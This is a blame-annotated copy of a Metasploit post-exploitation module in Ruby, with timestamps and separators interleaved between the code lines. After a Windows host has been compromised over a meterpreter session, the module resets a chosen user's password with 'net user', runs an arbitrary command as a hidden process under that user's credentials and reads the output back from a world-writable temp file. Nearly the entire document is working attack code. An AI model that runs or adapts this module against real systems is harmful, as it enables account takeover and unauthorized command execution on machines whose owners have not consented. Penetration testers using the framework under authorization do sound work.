2011-08-04 23:29:43 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-08-04 23:29:43 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Windows::Priv
|
2015-01-27 16:14:59 +00:00
|
|
|
include Msf::Post::Windows::Runas
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-01-27 16:34:52 +00:00
|
|
|
def initialize(info = {})
|
2013-08-30 21:28:54 +00:00
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Windows Manage Run Command As User",
|
2015-01-27 16:34:52 +00:00
|
|
|
'Description' => %q(
|
2013-08-30 21:28:54 +00:00
|
|
|
This module will login with the specified username/password and execute the
|
|
|
|
supplied command as a hidden process. Output is not returned by default, by setting
|
|
|
|
CMDOUT to false output will be redirected to a temp file and read back in to
|
|
|
|
display.By setting advanced option SETPASS to true, it will reset the users
|
|
|
|
password and then execute the command.
|
2015-01-27 16:34:52 +00:00
|
|
|
),
|
2013-08-30 21:28:54 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Platform' => ['win'],
|
|
|
|
'SessionTypes' => ['meterpreter'],
|
|
|
|
'Author' => ['Kx499']
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2015-01-27 16:14:59 +00:00
|
|
|
OptString.new('DOMAIN', [true, 'Domain to login with' ]),
|
|
|
|
OptString.new('USER', [true, 'Username to login with' ]),
|
|
|
|
OptString.new('PASSWORD', [true, 'Password to login with' ]),
|
2013-08-30 21:28:54 +00:00
|
|
|
OptString.new('CMD', [true, 'Command to execute' ]),
|
2015-01-27 16:34:52 +00:00
|
|
|
OptBool.new('CMDOUT', [true, 'Retrieve command output', false])
|
2013-08-30 21:28:54 +00:00
|
|
|
], self.class)
|
|
|
|
|
|
|
|
register_advanced_options(
|
|
|
|
[
|
2015-01-27 16:14:59 +00:00
|
|
|
OptBool.new('SETPASS', [true, 'Reset password', false])
|
2013-08-30 21:28:54 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
# Check if sufficient privileges are present for certain actions and run getprivs for system
|
|
|
|
# If you elevated privs to system,the SeAssignPrimaryTokenPrivilege will not be assigned. You
|
|
|
|
# need to migrate to a process that is running as
|
|
|
|
# system. If you don't have privs, this exits script.
|
|
|
|
def priv_check
|
|
|
|
if is_system?
|
|
|
|
privs = session.sys.config.getprivs
|
2015-01-27 16:14:59 +00:00
|
|
|
return privs.include?("SeAssignPrimaryTokenPrivilege") && privs.include?("SeIncreaseQuotaPrivilege")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2015-01-27 16:14:59 +00:00
|
|
|
|
|
|
|
false
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
2015-01-27 16:14:59 +00:00
|
|
|
def reset_pass(user, password)
|
2013-08-30 21:28:54 +00:00
|
|
|
begin
|
2015-01-27 16:14:59 +00:00
|
|
|
tmpout = cmd_exec("cmd.exe /c net user #{user} #{password}")
|
|
|
|
return tmpout.include?("successfully")
|
2013-08-30 21:28:54 +00:00
|
|
|
rescue
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2015-01-27 16:14:59 +00:00
|
|
|
def touch(path)
|
|
|
|
write_file(path, "")
|
|
|
|
cmd_exec("icacls #{path} /grant Everyone:(F)")
|
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-01-27 16:14:59 +00:00
|
|
|
def run
|
2013-08-30 21:28:54 +00:00
|
|
|
# Make sure we meet the requirements before running the script, note no need to return
|
|
|
|
# unless error
|
2015-01-27 16:14:59 +00:00
|
|
|
return unless session.type == "meterpreter"
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-01-27 16:14:59 +00:00
|
|
|
pi = nil
|
2013-08-30 21:28:54 +00:00
|
|
|
# check/set vars
|
|
|
|
setpass = datastore["SETPASS"]
|
|
|
|
cmdout = datastore["CMDOUT"]
|
|
|
|
user = datastore["USER"] || nil
|
2015-01-27 16:14:59 +00:00
|
|
|
password = datastore["PASSWORD"] || nil
|
2013-08-30 21:28:54 +00:00
|
|
|
cmd = datastore["CMD"] || nil
|
2015-01-27 16:14:59 +00:00
|
|
|
domain = datastore['DOMAIN']
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-01-27 16:14:59 +00:00
|
|
|
if setpass
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Setting user password")
|
2015-01-27 16:14:59 +00:00
|
|
|
fail_with(Exploit::Failure::Unknown, 'Error resetting password') unless reset_pass(user, password)
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
2015-01-27 16:14:59 +00:00
|
|
|
system_temp = get_env('WINDIR') << '\\Temp'
|
|
|
|
outpath = "#{system_temp}\\#{Rex::Text.rand_text_alpha(8)}.txt"
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-01-27 16:14:59 +00:00
|
|
|
# Create output file and set permissions so everyone can access
|
|
|
|
touch(outpath)
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
cmdstr = "cmd.exe /c #{cmd}"
|
|
|
|
cmdstr = "cmd.exe /c #{cmd} > #{outpath}" if cmdout
|
2015-01-27 16:14:59 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Check privs and execute the correct commands
|
2015-01-27 16:14:59 +00:00
|
|
|
# if user use createprocesswithlogon, if system logonuser and createprocessasuser
|
2013-08-30 21:28:54 +00:00
|
|
|
# execute command and get output with a poor mans pipe
|
|
|
|
if priv_check
|
2015-01-27 16:14:59 +00:00
|
|
|
print_status("Executing CreateProcessAsUserA...we are SYSTEM")
|
2015-01-27 21:10:31 +00:00
|
|
|
pi = create_process_as_user(domain, user, password, nil, cmdstr)
|
|
|
|
if pi
|
2015-01-27 16:34:52 +00:00
|
|
|
session.railgun.kernel32.CloseHandle(pi[:process_handle])
|
|
|
|
session.railgun.kernel32.CloseHandle(pi[:thread_handle])
|
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
else
|
2015-01-27 16:14:59 +00:00
|
|
|
print_status("Executing CreateProcessWithLogonW...")
|
|
|
|
pi = create_process_with_logon(domain, user, password, nil, cmdstr)
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# Only process file if the process creation was successful, delete when done, give us info
|
|
|
|
# about process
|
2015-01-27 16:14:59 +00:00
|
|
|
if pi
|
|
|
|
tmpout = read_file(outpath) if cmdout
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Command Run: #{cmdstr}")
|
2015-01-27 16:14:59 +00:00
|
|
|
vprint_status("Process Handle: #{pi[:process_handle]}")
|
|
|
|
vprint_status("Thread Handle: #{pi[:thread_handle]}")
|
|
|
|
vprint_status("Process Id: #{pi[:process_id]}")
|
|
|
|
vprint_status("Thread Id: #{pi[:thread_id]}")
|
|
|
|
print_status("Command output:\r\n#{tmpout}") unless tmpout.nil?
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
end
|
2011-08-04 23:29:43 +00:00
|
|
|
end
|